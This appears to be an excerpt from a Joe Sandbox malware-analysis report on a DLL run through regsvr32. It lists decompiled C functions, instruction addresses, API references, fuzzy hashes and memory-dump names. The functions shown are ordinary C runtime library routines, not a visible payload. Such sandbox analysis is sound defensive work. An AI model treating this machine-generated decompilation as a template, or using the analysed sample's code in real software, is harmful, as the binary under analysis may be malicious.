									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6E9EAC5A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6e9eae74
0x6e9eae76
0x6e9eae7b
0x6e9eae80
0x6e9eae82
0x6e9eae85
0x6e9eae8a
0x6e9eaf9a
0x6e9eaf9a
0x6e9eaf9a
0x00000000
0x6e9eae99
0x6e9eae99
0x6e9eae9e
0x6e9eaea8
0x6e9eaeaa
0x6e9eaeaf
0x6e9eaeb4
0x6e9eaeb4
0x6e9eaeb6
0x6e9eaeb9
0x6e9eaebe
0x6e9eaee0
0x6e9eaee0
0x6e9eaee3
0x6e9eaee6
0x6e9eaf04
0x6e9eaf07
0x6e9eaf46
0x6e9eaf49
0x6e9eaf4c
0x6e9eaf71
0x6e9eaf73
0x00000000
0x6e9eaf75
0x6e9eaf75
0x6e9eaf77
0x00000000
0x6e9eaf79
0x6e9eaf79
0x6e9eaf7e
0x6e9eaf82
0x6e9eaf82
0x6e9eaf83
0x00000000
0x6e9eaf83
0x6e9eaf77
0x6e9eaf4e
0x6e9eaf4e
0x6e9eaf50
0x00000000
0x6e9eaf52
0x6e9eaf52
0x6e9eaf54
0x00000000
0x6e9eaf56
0x6e9eaf67
0x00000000
0x6e9eaf6c
0x6e9eaf54
0x6e9eaf50
0x6e9eaf09
0x6e9eaf09
0x6e9eaf0d
0x00000000
0x6e9eaf13
0x6e9eaf13
0x6e9eaf15
0x00000000
0x6e9eaf1b
0x6e9eaf22
0x6e9eaf2a
0x6e9eaf2e
0x6e9eaf30
0x6e9eaf33
0x6e9eaf38
0x6e9eaf39
0x00000000
0x6e9eaf39
0x6e9eaf33
0x00000000
0x6e9eaf2e
0x6e9eaf15
0x6e9eaf0d
0x6e9eaee8
0x6e9eaee8
0x00000000
0x6e9eaee8
0x6e9eaec5
0x6e9eaec5
0x6e9eaeca
0x6e9eaecf
0x00000000
0x6e9eaed1
0x6e9eaed3
0x6e9eaedc
0x6e9eaeeb
0x6e9eaeed
0x6e9eafac
0x6e9eafac
0x6e9eafb1
0x6e9eafb2
0x6e9eafb4
0x6e9eafb9
0x6e9eafbe
0x6e9eafc1
0x6e9eafc4
0x6e9eafc7
0x6e9eafd0
0x6e9eafd0
0x6e9eafc9
0x6e9eafc9
0x6e9eafc9
0x6e9eafd3
0x6e9eafd7
0x6e9eafda
0x6e9eafdb
0x6e9eafdc
0x6e9eafdd
0x6e9eafe0
0x6e9eafe9
0x6e9eafe9
0x6e9eafec
0x6e9eb022
0x6e9eafee
0x6e9eafee
0x6e9eafee
0x6e9eaff1
0x6e9eb008
0x6e9eb008
0x6e9eaff1
0x6e9eb027
0x6e9eb031
0x6e9eb03d
0x6e9eaefb
0x6e9eaefb
0x6e9eaf00
0x6e9eaf01
0x6e9eaf3b
0x6e9eaf42
0x6e9eaf86
0x6e9eaf86
0x6e9eaf8d
0x6e9eaf9c
0x6e9eaf9f
0x6e9eafab
0x6e9eafab
0x6e9eaeed
0x6e9eaecf
0x00000000
0x00000000
0x00000000
0x6e9eae9e

APIs

___AdjustPointer.LIBCMT ref: 6E9EAF3B
___AdjustPointer.LIBCMT ref: 6E9EAF5E
___AdjustPointer.LIBCMT ref: 6E9EAFFA

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
Instruction ID: bdfd3962fb167fecf520b6702de0c2b4326775ae55bffdb29cdd9afb1e489efe
Opcode Fuzzy Hash: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
Instruction Fuzzy Hash: B151D2B2504706AFDB1B8FD1D850BAA77B8EF44314F104A2DEA1547AA4E7B1E881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EEAAF Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EEAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6E9EFCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6E9EFCA5(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6E9ED437(GetLastError());
									_t19 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6E9EF0EB(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6E9ED437(GetLastError());
						return  *((intOrPtr*)(E6E9ED46D(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6E9EF0EB(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6E9EF0D1(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6e9eeab6
0x6e9eeabb
0x6e9eead9
0x6e9eeadb
0x6e9eeade
0x6e9eeb0b
0x6e9eeb13
0x6e9eeb15
0x6e9eeb2e
0x6e9eeb31
0x6e9eeb34
0x6e9eeb42
0x6e9eeb51
0x6e9eeb59
0x6e9eeb5b
0x6e9eeb74
0x6e9eeb77
0x6e9eeb77
0x6e9eeb5d
0x6e9eeb64
0x6e9eeb6f
0x6e9eeb6f
0x6e9eeb79
0x00000000
0x6e9eeb79
0x6e9eeb39
0x6e9eeb3e
0x6e9eeb40
0x00000000
0x00000000
0x00000000
0x6e9eeb40
0x6e9eeb1e
0x00000000
0x6e9eeb29
0x6e9eeae0
0x6e9eeae3
0x6e9eeae6
0x6e9eeaf9
0x6e9eeafc
0x6e9eeacf
0x6e9eeacf
0x00000000
0x6e9eead2
0x6e9eeaec
0x6e9eeaf1
0x6e9eeaf3
0x6e9eeb7d
0x6e9eeb7d
0x00000000
0x6e9eeaf3
0x6e9eeabd
0x6e9eeac2
0x6e9eeac7
0x6e9eeac9
0x6e9eeacc
0x00000000

APIs

Part of subcall function 6E9EF0D1: _free.LIBCMT ref: 6E9EF0DF

Part of subcall function 6E9EFCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E9EE286,6E9F12A9,0000FDE9,00000000,?,?,?,6E9F1022,0000FDE9,00000000,?), ref: 6E9EFD51

GetLastError.KERNEL32 ref: 6E9EEB17
__dosmaperr.LIBCMT ref: 6E9EEB1E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E9EEB5D
__dosmaperr.LIBCMT ref: 6E9EEB64

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
Instruction ID: 53f2e6e79a7748f1c23b096899726fd6b389ecea3f2955296dadf3302866230c
Opcode Fuzzy Hash: 8de9e3486de3f4f38312ac5bfc8f53e4a52a70ae4ba6404864fe61a81c6582f9
Instruction Fuzzy Hash: 3D21D871504605BFE7129FF69C80D57B7ACEF51368714891AFA2A93E90D730EC408F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED9BC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6E9ED9BC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e9fc110; // 0xffffffff
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E9EDC48(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t51);
							if(__eflags != 0) {
								E6E9ED7BE(_t51, 0x6e9fd850);
								E6E9EDC0E(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E9EDF59(0,  *0x6e9fc110, 0);
							_push(0);
							L9:
							E6E9EDC0E();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E9EDF1A(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e9fc110; // 0xffffffff
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E9ED547(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6e9fc110; // 0xffffffff
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E9EDF59(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E9EDC48(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t60);
								if(__eflags != 0) {
									E6E9ED7BE(_t60, 0x6e9fd850);
									E6E9EDC0E(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E9EDF59(__eflags,  *0x6e9fc110, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E9EDF59(__eflags,  *0x6e9fc110, _t20);
								_push(_t60);
								L25:
								E6E9EDC0E();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E9EDF1A(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e9fc110; // 0xffffffff
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E9ED547(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e9fc110; // 0xffffffff
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E9EDF59(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E9EDC48(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t54);
											if(__eflags != 0) {
												E6E9ED7BE(_t54, 0x6e9fd850);
												E6E9EDC0E(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E9EDF59(__eflags,  *0x6e9fc110, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E9EDF59(0,  *0x6e9fc110, 0);
											_push(0);
											L41:
											E6E9EDC0E();
											goto L36;
										}
									}
								} else {
									_t54 = E6E9EDF1A(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e9fc110; // 0xffffffff
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6e9ed9bc
0x6e9ed9bc
0x6e9ed9c7
0x6e9ed9c9
0x6e9ed9ce
0x6e9ed9d1
0x6e9ed9ef
0x6e9ed9f2
0x6e9ed9f7
0x6e9ed9f9
0x00000000
0x6e9ed9fb
0x6e9eda07
0x6e9eda0a
0x6e9eda0b
0x6e9eda0d
0x6e9eda32
0x6e9eda34
0x6e9eda4d
0x6e9eda54
0x6e9eda59
0x00000000
0x6e9eda36
0x6e9eda36
0x6e9eda3f
0x6e9eda44
0x00000000
0x6e9eda44
0x6e9eda0f
0x6e9eda0f
0x6e9eda0f
0x6e9eda18
0x6e9eda1d
0x6e9eda1e
0x6e9eda1e
0x6e9eda23
0x00000000
0x6e9eda23
0x6e9eda0d
0x6e9ed9d3
0x6e9ed9d9
0x6e9ed9dd
0x6e9ed9ea
0x00000000
0x6e9ed9df
0x6e9ed9e2
0x6e9eda5c
0x6e9eda5c
0x6e9ed9e4
0x6e9ed9e4
0x6e9ed9e4
0x6e9ed9e6
0x6e9ed9e6
0x6e9ed9e6
0x6e9ed9e2
0x6e9ed9dd
0x6e9eda5f
0x6e9eda67
0x6e9eda69
0x6e9eda6b
0x6e9eda73
0x6e9eda78
0x6e9eda79
0x6e9eda7e
0x6e9eda7f
0x6e9eda82
0x6e9eda9c
0x6e9eda9f
0x6e9edaa4
0x6e9edaa6
0x00000000
0x6e9edaa8
0x6e9edab4
0x6e9edab7
0x6e9edab8
0x6e9edaba
0x6e9edadd
0x6e9edadf
0x6e9edaf6
0x6e9edafd
0x6e9edb02
0x00000000
0x6e9edae1
0x6e9edae8
0x6e9edaed
0x00000000
0x6e9edaed
0x6e9edabc
0x6e9edac3
0x6e9edac8
0x6e9edac9
0x6e9edac9
0x6e9edace
0x00000000
0x6e9edace
0x6e9edaba
0x6e9eda84
0x6e9eda8a
0x6e9eda8c
0x6e9eda8e
0x6e9eda97
0x00000000
0x6e9eda90
0x6e9eda90
0x6e9eda93
0x6e9edb0d
0x6e9edb0d
0x6e9edb12
0x6e9edb15
0x6e9edb16
0x6e9edb17
0x6e9edb1e
0x6e9edb20
0x6e9edb25
0x6e9edb28
0x6e9edb46
0x6e9edb49
0x6e9edb4e
0x6e9edb50
0x00000000
0x6e9edb52
0x6e9edb5e
0x6e9edb62
0x6e9edb64
0x6e9edb89
0x6e9edb8b
0x6e9edba4
0x6e9edbab
0x00000000
0x6e9edb8d
0x6e9edb8d
0x6e9edb96
0x6e9edb9b
0x00000000
0x6e9edb9b
0x6e9edb66
0x6e9edb66
0x6e9edb66
0x6e9edb6f
0x6e9edb74
0x6e9edb75
0x6e9edb75
0x00000000
0x6e9edb7a
0x6e9edb64
0x6e9edb2a
0x6e9edb30
0x6e9edb32
0x6e9edb34
0x6e9edb41
0x00000000
0x6e9edb36
0x6e9edb36
0x6e9edb39
0x6e9edbb3
0x6e9edbb3
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3d
0x6e9edb3d
0x6e9edb3d
0x6e9edb39
0x6e9edb34
0x6e9edbb6
0x6e9edbbe
0x6e9edbc0
0x6e9edbc0
0x6e9edbc7
0x6e9eda95
0x6e9edb05
0x6e9edb05
0x6e9edb07
0x00000000
0x6e9edb09
0x6e9edb0c
0x6e9edb0c
0x6e9edb07
0x6e9eda93
0x6e9eda8e
0x6e9eda6d
0x6e9eda72
0x6e9eda72

APIs

GetLastError.KERNEL32(?,?,?,6E9F0D69,?,00000001,6E9EE2F7,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000), ref: 6E9ED9C1
_free.LIBCMT ref: 6E9EDA1E
_free.LIBCMT ref: 6E9EDA54
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9F1223,00000001,?,?,?,6E9EE286,?,00000000,00000000,6E9FA968,0000002C,6E9EE2F7), ref: 6E9EDA5F

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: cf6042b648d84da9201936f48e8921baca74af797b59627b598c325c4c0279a3
Instruction ID: dd0e51dff4244c7f3e39ebd9b144bc09fbf43c2d6b4110f512730f674ba788a9
Opcode Fuzzy Hash: cf6042b648d84da9201936f48e8921baca74af797b59627b598c325c4c0279a3
Instruction Fuzzy Hash: 3511A07271C5027A9B4756F59C81A6E226E9FD22BCB210E24F739AABD0DB65CC018D50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EDB13 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9EDB13(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6e9fc110; // 0xffffffff
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E9EDC48(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t18);
							if(__eflags != 0) {
								E6E9ED7BE(_t18, 0x6e9fd850);
								E6E9EDC0E(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E9EDF59(0,  *0x6e9fc110, 0);
							_push(0);
							L9:
							E6E9EDC0E();
							goto L4;
						}
					}
				} else {
					_t18 = E6E9EDF1A(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e9fc110; // 0xffffffff
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6e9edb1e
0x6e9edb20
0x6e9edb25
0x6e9edb28
0x6e9edb46
0x6e9edb49
0x6e9edb4e
0x6e9edb50
0x00000000
0x6e9edb52
0x6e9edb5e
0x6e9edb62
0x6e9edb64
0x6e9edb89
0x6e9edb8b
0x6e9edba4
0x6e9edbab
0x00000000
0x6e9edb8d
0x6e9edb8d
0x6e9edb96
0x6e9edb9b
0x00000000
0x6e9edb9b
0x6e9edb66
0x6e9edb66
0x6e9edb66
0x6e9edb6f
0x6e9edb74
0x6e9edb75
0x6e9edb75
0x00000000
0x6e9edb7a
0x6e9edb64
0x6e9edb2a
0x6e9edb30
0x6e9edb34
0x6e9edb41
0x00000000
0x6e9edb36
0x6e9edb39
0x6e9edbb3
0x6e9edbb3
0x6e9edb3b
0x6e9edb3b
0x6e9edb3b
0x6e9edb3d
0x6e9edb3d
0x6e9edb3d
0x6e9edb39
0x6e9edb34
0x6e9edbb6
0x6e9edbbe
0x6e9edbc7

APIs

GetLastError.KERNEL32(?,?,?,6E9ED472,6E9F0290,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?), ref: 6E9EDB18
_free.LIBCMT ref: 6E9EDB75
_free.LIBCMT ref: 6E9EDBAB
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?,00000004), ref: 6E9EDBB6

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e23f666a1cfe3f6690b8b433de640e998446e7254efb23572f0592efafd8f89c
Instruction ID: cb2426093db115a57666725cc76ca2749648936d5132a7f0ab97371a7ed44636
Opcode Fuzzy Hash: e23f666a1cfe3f6690b8b433de640e998446e7254efb23572f0592efafd8f89c
Instruction Fuzzy Hash: 0C11C2726185016AD74746F95C81E6A235E9FD23B87284E24F33596BC0EA61CC018D50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F2BEE Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F2BEE(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E9F2BD7();
					E6E9F2B99();
					_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6e9f2c0b
0x6e9f2c0f
0x6e9f2c1c
0x6e9f2c21
0x6e9f2c3c
0x6e9f2c3c
0x6e9f2c42

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001), ref: 6E9F2C05
GetLastError.KERNEL32(?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001,?,6E9F1244,6E9EE286), ref: 6E9F2C11

Part of subcall function 6E9F2BD7: CloseHandle.KERNEL32(FFFFFFFE,6E9F2C21,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001), ref: 6E9F2BE7

___initconout.LIBCMT ref: 6E9F2C21

Part of subcall function 6E9F2B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E9F2BC8,6E9F2777,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2BAC

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2C36

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
Instruction ID: 886c8ab94524c36398b12193c29dbaa89c3e8f8d41509452e4c0b74130c1732d
Opcode Fuzzy Hash: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
Instruction Fuzzy Hash: 14F01C36104558BBCF121FE1EC08AC93F6AEF4B7A5F058410FE1996120C732CC20EB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED260 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9ED260() {

				E6E9EDC0E( *0x6e9fd844);
				 *0x6e9fd844 = 0;
				E6E9EDC0E( *0x6e9fd848);
				 *0x6e9fd848 = 0;
				E6E9EDC0E( *0x6e9fd9c8);
				 *0x6e9fd9c8 = 0;
				E6E9EDC0E( *0x6e9fd9cc);
				 *0x6e9fd9cc = 0;
				return 1;
			}

0x6e9ed269
0x6e9ed276
0x6e9ed27c
0x6e9ed287
0x6e9ed28d
0x6e9ed298
0x6e9ed29e
0x6e9ed2a6
0x6e9ed2af

APIs

_free.LIBCMT ref: 6E9ED269

Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9ED27C
_free.LIBCMT ref: 6E9ED28D
_free.LIBCMT ref: 6E9ED29E

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1b1f4b75ead9c1071196169ce390e7b3b28a33a9548470ee03233c13b78ccc75
Instruction ID: ffee10e280a6d1227c949e178b854aadad9e6fd8cf8f0f6468ced24064e19f77
Opcode Fuzzy Hash: 1b1f4b75ead9c1071196169ce390e7b3b28a33a9548470ee03233c13b78ccc75
Instruction Fuzzy Hash: 39E046B080A921DACF121FA4BA016CD3FBAEFD7650B210506E40202310C7B180929FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC978 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E9EC978(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
